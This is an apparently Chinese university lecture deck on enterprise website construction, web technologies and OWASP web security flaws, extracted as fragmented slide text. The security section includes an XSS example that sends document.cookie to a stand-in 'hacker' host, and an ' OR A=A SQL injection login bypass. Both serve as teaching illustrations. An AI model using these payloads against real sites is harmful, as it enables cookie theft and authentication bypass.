企业网站服务之建置与管理

1、企業網站服務之建置與管理國立暨南國際大學資訊管理學系陳彥錚.大綱WWW技術簡介企業網站建置WWW平安.1. WWW技術簡介(1945)Vannevar Bush發表 “As We May Think (Atlantic Monthly)超連結(Hyperlink)(Mar. 1989)服務於CERN之Tim Berners-Lee發表 “Information Management: A ProposalA client/server model for a distributed hypertext system CERN: European Organization for Nuclear

2、 Research .WWW技術發展(1990) Tim BL撰寫第一個Web 瀏覽器: WorldWideWeb(Sep. 1993) NCSA發表Mosaic browser.(Mar. 1994) Marc Andreessen & Jim Clark 開設 Mosaic Communications Corp. (後改名Netscape)(Dec. 1994) Netscape發表Netscape Navigator 只援助HTMLNCSA: National Center for Supercomputing Applications.HTML and 2. Response1. R

3、equestHTML DocumentClient PCWeb ServerBrowserWeb ServerApplication.BrowserIE (49%)Firefox (43%)Google Chrome (3%)Safari, Opera, Web Server Apache (50%) Microsoft IIS (35%) Google GWS (6%) ./wiki/Usage_share_of_web_browsersw3schools/browsers/browsers_stats.asp.Downloading a Web Page with Two Graphics

4、 FilesClient PCBrowserWeb ServerApplicationWeb ServerWebpage Consists of Three FilesRendered as a Single Page On-ScreenAsDisplayed2GraphicsFilesHTML Document.tw/ycchen/www/wwwm.html.Downloading a Web Page with Two Graphics Files1.HTML DocumentClient PCBrowserWeb ServerApplicationWeb ServerDownload R

5、equires 3 Request-Response Cycles;Downloads HTML Page FirstIt has Tags to Identify Other FilesAsDisplayed2GraphicsFilesHTML Document.Downloading a Web Page with Two Graphics FilesClient PCBrowserWeb ServerApplicationWeb ServerAsDisplayed2GraphicsFiles2.3.WWW技術發展-JavaScript(Dec. 1995) Netscape Naviga

6、tor 2.0援助JavaScript可於Brower中解譯執行的程式語言for (i=0;i10;i+) document.write();alert(Welcome to JavaScript Test!nSee you!);.Advantages of Using JavaScriptValidate users input. Perform aggregrate calculations. Easily prompt a user for confirmation, alert, pop-up information. Control of Web browsers behaviors

7、 and HTML page components properties. Conditionalize HTML. Perform operations independent of server information. Control of Dynamic HTML. .tw/ycchen/www/js/byExample.html.tw/ycchen/www2000/npm.html.Java(Jan. 1996) Sun公司發表Java程式語言Java應用程式編譯成Bytecode，可在援助JVM (Java Virtual Machine)之環境執行Java Applet可在Web

8、瀏覽器執行的Java小程式歡迎运用校務自動化系統 .Cascading Style Sheets (CSS)樣式表 (Stylesheet) 語言提供網頁設定樣式功能，讓網頁能以更精確與結構化方式顯示網頁版面Dynamic HTML: JavaScript + CSS w3schools/css/default.aspa text-decoration:none; td background-color:Ivory; ul list-style-image:url(gball.gif);h2 color:white; background-color:black; font-size:1in

9、.tw/.其他Browser端Web技術瀏覽器之plug-in (附加元件)功能Flash (.tw/ycchen/doc1/)PDF, Windows Media Player, QuickTime, XML (Extensible Markup Language)AJAX: Asynchronous JavaScript and XML s96211341Chia-Chia Lius96211341.tw.zdnet.tw/news/software/0,2000085678,20215297,00.htm.chinese.engadget/2021/05/10/opera-hakon-w

10、ium-lie-and-von-tetzchner-talk-web/.網頁設計應留意事項兼顧美工與內容防止运用橫向捲軸從216種Safety Color 選用顏色 考慮瀏覽器的差異性 (JavaScript, ActiveX, CSS, )超連結之正確性file/C:/www/radio.html/xx.html.Server端Web技術Common Gateway Interface (CGI)Web Server 與 Server端應用程式之介面Server端Web程式語言ASP, JSP, Perl, PhpDatabaseMS SQL Server, MySQL, mSQL, Ora

11、cle .Web Content Management System (CMS)Joomla!joomla123.tw/classicalvinylrepublic.tw/WordPressDrupalXoops.2. 企業網站建置網頁(程式)設計靜態網頁、Flash多媒體、動態網頁程式電子商務會員制付款機制: 信誉卡、ATM轉帳、貨到付款 網站架設自行架設虛擬主機 (Virtual Hosting)主機代管 (Co-Location).自行架設網站硬體：機櫃式Server、RAID硬碟?、不斷電系統軟體：作業系統、Web 伺服器程式、資料庫XAMPP網路：IP位址、主機領域名稱對外頻寬網路平

12、安及防火牆.虛擬主機 (Virtual Hosting)由ISP出租架設網站所需之硬體、軟體、網路服務。專屬領域名稱及網路位址 磁碟空間網路頻寬Server端Web程式語言援助資料庫後台管理 .主機代管 (Co-Location)ISP提供機房與網路，供企業客戶放置本人的主機與網路設備。IDC (Internet Data Center)服務機房空間網路頻寬提供IP位址網路管理：流量監測、障礙管理網路平安: DDoS攻擊、掃毒.3. WWW平安Web security is important for E-Commerce.Previous studies: SSLSETWeb server

13、securityApplication-level securityWeb applications mistakenly trust data returned from a client.OWASPOpen Web Application Security Project (OWASP)/index.php/Taiwan.十大Web資安破绽列表A1.跨站腳本攻擊 (Cross Site Scripting，簡稱XSS)A2. 注入缺失(Injection Flaw)：SQL Injection與Command InjectionA3. 惡意檔案執行(Malicious File Execu

14、tion) A4. 不平安的物件參考(Insecure Direct Object Reference) A5. 跨網站的偽造要求 (Cross-Site Request Forgery，簡稱CSRF) A6. 資訊揭露與不適當錯誤A7. 遭破壞的鑑別與連線管理 A8. 不平安的密碼儲存器A9. 不平安的通訊(Insecure Communication)A10. 疏於限制URL存取(Failure to Restrict URL Access)資料來源： OWASP台灣分會OWASP: Open Web Application Security Project (2007).The Ten

15、Most Critical Web Application Security VulnerabilitiesUnvalidated ParametersBroken Access ControlBroken Account and Session ManagementCross-Site Scripting (XSS)Buffer OverflowsCommand Injection FlawsError Handling ProblemsInsecure Use of CryptographyRemote Administration FlawsWeb and Application Ser

16、ver Misconfiguration.(1). Unvalidated Parameters Information from web requests is not validated before being used by a web application.Attackers can use these flaws to attack background components through a web application.(2). Broken Access ControlRestrictions on what authenticated users are allowe

17、d to do are not properly enforced.Attackers can exploit these flaws to access other users accounts, view sensitive files, or use unauthorized functions.citibank/print.asp?id=u1257.(3). Broken Account and Session ManagementAccount credentials and session tokens are not properly protected.Attackers th

18、at can compromise passwords, keys, session cookies, or other tokens can defeat authentication restrictions and assume other users identities.(4). Cross-Site Scripting (XSS)The web application can be used as a mechanism to transport an attack to an end users browser.A successful attack can disclose t

19、he end users session token, attack the local machine, or spoof content to fool the user.XSS Examplewindow.location=hacker/steal.cgi?ck=+document.cookie;留言版.XSS Web Application Hijack Scenariohacker.(5). Buffer OverflowsWeb application components in some languages that do not properly validate input

20、can be crashed and, in some cases, used to take control of a process.These components can include CGI, libraries, drivers, and web application server components.(6). Command Injection FlawsWeb applications pass parameters when they access external systems or the local operating system.If an attacker

21、 can embed malicious commands in these parameters, the external system may execute those commands on behalf of the web application.SQL Injection SQLQuery = “SELECT FROM Users WHERE (UserName= + strUN + “) AND (Password= + strPW + “); User name “fredchen, password “199msq :SELECT FROM Users WHERE (Us

22、erName=fredchen) AND (Password=199msq); SQL Injection: User name/Password : OR A=ASELECT FROM Users WHERE(UserName= OR A=A) AND (Password= OR A=A);.Input Validation.(7). Error Handling ProblemsError conditions that occur during normal operation are not handled properly.If an attacker can cause errors to occur that the web application does not handle, they can gain detailed system information, deny service, cause security mechanisms to fail, or crash the server.(8). Insecure U